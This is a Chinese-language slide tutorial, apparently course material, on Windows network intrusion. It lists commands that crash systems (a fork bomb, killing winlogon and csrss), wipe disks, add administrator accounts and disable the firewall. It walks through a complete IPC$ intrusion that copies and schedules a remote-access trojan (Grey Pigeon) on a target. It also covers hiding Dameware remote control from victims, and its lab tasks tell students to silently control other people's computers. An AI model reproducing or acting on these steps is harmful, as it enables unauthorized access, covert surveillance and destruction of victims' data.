当前位置:首页 >> IT/计算机 >>

网络安全攻防技术教程


第2章 章

网络入侵基础知识、 网络入侵基础知识、 入侵实战

李冰川 QQ:594520163 Email:aizhihuo218@163.com

章节目标
常用的DOS命令 命令 常用的 常用的入侵命令 Hack实战一:命令行下的入侵 实战一: 实战一 Hack实战二:图形界面的入侵 实战二: 实战二 流行远程控制木马的使用方法 键盘记录程序的使用方法

Page 2

常用DOS命令 常用 命令1 命令
Cd 切换目录 Dir 列出所有文件信息 Del 删除文件 Md 创建目录 Rd删除目录 删除目录 Copy 复制 Xcopy 复制文件和文件夹 Cls 清屏 Attrib 修改文件、文件夹属性 修改文件、 Date、Time显示日期、时间 显示日期、 、 显示日期
Page 3

常用DOS命令 常用 命令2 命令
Path 系统路径 Set 显示、设置系统信息 显示、 Ren(Rename)重命名 重命名 Subst 虚拟磁盘 Ver 显示操作系统版本 Help 帮助 /? 显示某条命令的帮助

Page 4

非主流DOS命令 非主流 命令1 命令
1.重复执行某条命令直至死机的批处理代码: 重复执行某条命令直至死机的批处理代码: 重复执行某条命令直至死机的批处理代码 start cmd %0 2.复制一个文件的磁盘的每个子文件夹当中: 复制一个文件的磁盘的每个子文件夹当中: 复制一个文件的磁盘的每个子文件夹当中 for /r /d %a in (*) do copy test.txt "%a" /y 3.不停地执行同一条命令: 不停地执行同一条命令: 不停地执行同一条命令 for /l %a in (1,0,2) do net send 192.168.1.1 "炸弹来了! 炸弹来了! 炸弹来了 " 4.死机 蓝屏 死机,蓝屏 死机 ntsd -c q -pn winlogon.exe ntsd -c q -pn csrss.exe
Page 5

非主流DOS命令 非主流 命令2 命令
5.删除磁盘所有文件: 删除磁盘所有文件: 删除磁盘所有文件 del * /a /s /q /f 6.创建名字为空的文件夹: 创建名字为空的文件夹: 创建名字为空的文件夹 md (按住 键,在小键盘上按 按住Alt键 在小键盘上按2,5,5,然后松开 然后松开Alt,回车 回车) 按住 然后松开 回车 7.创建无法删除的特殊名字文件夹: 创建无法删除的特殊名字文件夹: 创建无法删除的特殊名字文件夹 md \\.\c:\con md \\.\c:\aux 8.创建无法双击打开无法删除的另类文件夹: 创建无法双击打开无法删除的另类文件夹: 创建无法双击打开无法删除的另类文件夹 md test..\ rd test..\ /s /d
Page 6

常用入侵命令1 常用入侵命令
net user 用户名 密码 /add (建立用户 建立用户) 建立用户 net localgroup administrators 用户名 密码 /add (将用 将用 户加到管理员,使其拥有管理权限) 户加到管理员,使其拥有管理权限 net user guest /active:Yes (激活 激活guest用户 用户) 激活 用户 net user guest 12345 (修改 修改guest密码为 密码为12345) 修改 密码为 net user (查看账号属性 查看账号属性) 查看账号属性 net use \\ip\ipc$ “” /user (建立空 建立空IPC连接 连接) 建立空 连接 net use \\ip\ipc$ “密码 /user:“用户名 (建立 密码” 用户名” 建立IPC非空连 密码 用户名 建立 非空连 非空链接就是需要帐户和密码) 接,非空链接就是需要帐户和密码 net use \\ip\ipc$ /del (删除 删除IPC空连接 空连接) 删除 空连接 net use z: \\127.0.0.1\c$(映射目标主机磁盘 盘到本地磁 映射目标主机磁盘c盘到本地磁 映射目标主机磁盘 盘Z盘) 盘
Page 7

常用入侵命令2 常用入侵命令
net start (查看开启了哪些服务 查看开启了哪些服务) 查看开启了哪些服务 net start 服务名 (开启服务 开启服务) 开启服务 net time \\目标 (查看对方时间 目标IP 查看对方时间 查看对方时间) 目标 net view (查看局域网中开启了哪些共享 查看局域网中开启了哪些共享) 查看局域网中开启了哪些共享 net share (查看本地开启的哪些共享 查看本地开启的哪些共享) 查看本地开启的哪些共享 net share C$/del (删除 盘默认共享 删除C盘默认共享 删除 盘默认共享) netstat -an (查看计算机开放了哪些端口 查看计算机开放了哪些端口) 查看计算机开放了哪些端口 Copy xx.exe\\ip\admin$\System32 (将当前 将当前 xx.exe复制到对方 复制到对方Admin$共享的 共享的System32目录 复制到对方 共享的 目录 内)
Page 8

常用入侵命令3 常用入侵命令
sc config tlnesvr start= auto(修改 修改telnet服务的 修改 服务的 启动方式为自动, 前面有一个空格) 启动方式为自动,auto前面有一个空格 前面有一个空格 net stop sharedaccess(关闭系统自带的防火墙 关闭系统自带的防火墙) 关闭系统自带的防火墙 net send IP 消息 利用 消息(利用 利用messenger服务向目标 服务向目标IP 服务向目标 发送消息) 发送消息 ntsd -c q -pn winlogon.exe(蓝屏重启 蓝屏重启) 蓝屏重启 ntsd -c q -pn csrss.exe(死机 死机) 死机 tasklist(查看进程 查看进程) 查看进程 taskkill(结束进程 结束进程) 结束进程
Page 9

实战:纯DOS命令入侵 实战: 命令入侵
net use \\192.168.2.20\ipc$ “123” /user:”administrator” net time \\192.168.2.20 Copy c:\server.exe \\192.168.2.20\admin$\svchost.exe At \\192.168.2.20 12:00 start c:\windows\svchost.exe

这样,对方就中了灰鸽子服务端了。 这样,对方就中了灰鸽子服务端了。

Page 10

几个小例子
开启禁用的telnet服务: 服务: 开启禁用的 服务 sc config tlntsvr start= auto(auto前有空格 前有空格) 前有空格 开启3389远程终端 开启 远程终端 reg add 开启C盘默认共享 开启 盘默认共享 net share c$=c: 开启计划任务服务( 命令需要这一服务 命令需要这一服务) 开启计划任务服务(at命令需要这一服务) net start schedule 开启远程注册表(Remote Registry)服务 开启远程注册表 服务 net start remoteregistry
Page 11

图形界面入侵
一、计算机管理 操作菜单 连接到另一台计算机 二、注册表编辑器 文件菜单 连接网络注册表 三、第三方工具比如Dameware、Pcanywhere 第三方工具比如 、
Dameware的使用方 的使用方 法
Page 12

Dameware的隐藏 的隐藏
控制对方, 用Dameware控制对方,要做到悄无声息,需要注 控制对方 要做到悄无声息, 意以下几点: 意以下几点: 激活软件,输入注册码注册软件; 点帮助菜单 激活软件,输入注册码注册软件; 在远程连接对话框上单击“设置” 勾选: 在远程连接对话框上单击“设置”,勾选: 查看模式” 显示远程鼠标指针” “查看模式”和“显示远程鼠标指针”; 切换到“安装选项”选项卡,勾选上“ 切换到“安装选项”选项卡,勾选上“复制配置文 然后点“编辑” 件”然后点“编辑”: 附加设置”选项卡上“允许托盘图标” 把“附加设置”选项卡上“允许托盘图标”勾掉 再把“通知对话”选项卡上“连接时通知”勾掉。 再把“通知对话”选项卡上“连接时通知”勾掉。
Page 13

XP默认不能远程控制的原因 默认不能远程控制的原因
在运行中输入命令secpol.msc打开安全策略 打开安全策略 在运行中输入命令 展开“本地策略” 安全选项 安全选项” 红色表示默认选 展开“本地策略” “安全选项” (红色表示默认选 项)
“安全选项:本地账户的共享和安全模式” 安全选项:本地账户的共享和安全模式” 安全选项
? 经典,表示在远程可以拥有管理员权限 经典, ? 仅来宾,表示在远程只能拥有guest权限 仅来宾,表示在远程只能拥有 权限

“账户:使用空白密码的账户只允许进行控制台登录” 账户:使用空白密码的账户只允许进行控制台登录”
? 启用,账户密码为空则不允许远程访问 启用, ? 禁用,账户密码为空也允许远程访问 禁用,

所以,要想控制系统为XP的计算机 的计算机, 所以,要想控制系统为 的计算机,必须考虑对 方安全策略的设置 安全策略的设置不影响利用木马进行控制
Page 14

灰鸽子
以华夏灰鸽子2009为例,注意事项: 为例,注意事项: 以华夏灰鸽子 为例
IP地址栏一定要填写自己的 地址,而且不要忘了加 地址栏一定要填写自己的IP地址 地址栏一定要填写自己的 地址, 上冒号和端口号

Page 15

PcShare
使用方法和灰鸽子类似

Page 16

键盘记录
以“keyghost”和“简单键盘记录程序”为例 和 简单键盘记录程序”

Page 17

实验任务
练习前面PPT中的 中的DOS命令 练习前面 中的 命令 开一台2003虚拟机,利用命令入侵,以能够 虚拟机, 开一台 虚拟机 利用命令入侵, telnet到对方电脑为入侵成功的标志 到对方电脑为入侵成功的标志 到对方电脑 开一台2003虚拟机,利用图形界面入侵,以能够 虚拟机, 开一台 虚拟机 利用图形界面入侵, 控制对方桌面为入侵成功的标志 控制对方桌面为入侵成功的标志 使用远控软件Dameware控制别人电脑 使用远控软件 控制别人电脑 要求:悄无声息,不能被对方发现) (要求:悄无声息,不能被对方发现) 利用灰鸽子控制别人电脑
Page 18


相关文章:
网络攻击技术及攻击实例介绍
网络攻击技术及攻击实例介绍摘要:随着计算机网络的广泛使用,网络攻击技术也迅猛发展。研究网络攻击带 来的各种威胁, 有针对性的对这些威胁进行有效防范,是加固安全防御...
网络安全与攻防技术-答题卷
网络安全攻防技术-答题卷 - 第一题 得分 评卷人 打开 Zenmap 扫描工具: 点击配置中新的配置或命令配置相关文件:配置文件名为 147,选中扫描端 口中的操作系统...
网络信息安全 网络攻击原理与技术
网络信息安全 网络攻击原理与技术_互联网_IT/计算机_专业资料。第1章 网络攻击原理与技术 1. 目前网络攻击技术和攻击工具正在向以下儿个方面快速 发展。 1).网络...
《网络安全攻防技术》讲义知识点归纳(精简后)
网络安全攻防技术》讲义知识点归纳(精简后) - 第 1 讲:网络安全概述 1、计算机网络:我们讲的计算机网络,其实就是利用通讯设备和线路将地理位置不同的、功能...
网络安全技术课程学习体会
网络安全技术课程学习体会 - 课程学习体会 通过学习网络安全技术这门课, 我了解到随着计算机网络的不断 发展,全球信息化已成为人类发展的大趋势;给政府机构、企事业...
网络攻防技术报告
网络攻防技术报告 - 目录 一、 网络攻击技术 ......
0-综合实践项目5 WEB安全攻防技术实践
0-综合实践项目5 WEB安全攻防技术实践_互联网_IT/计算机_专业资料。web安全,网络安全 PINGDINGSHAN UNIVERSITY 课程项目报告 题 目: WEB 安全攻防技术实践 院 ( ...
计算机网络攻防技术毕业设计论文
计算机网络攻防技术毕业设计论文_互联网_IT/计算机_专业资料。网络攻防技术毕业...计算机网络 面临的各种安全威胁,系统地介绍网络安全技术。并针对网络的安全问题...
信息安全 实验三 网络攻防技术_图文
信息安全 实验三 网络攻防技术 - 实验三 实验 3-1 帐号口令破解 一 实验目的 网络攻防技术 通过密码破解工具的使用,了解帐号的安全性,掌握安全口令的设置原则,以...
网络安全攻防
网络安全攻防 - 网络安全攻防,广州白云网络安全攻防---网络与信息安全基础、简单网络故障排除、安全模型与结构、协议与服务安全、网络安全管理与防范、...
更多相关标签: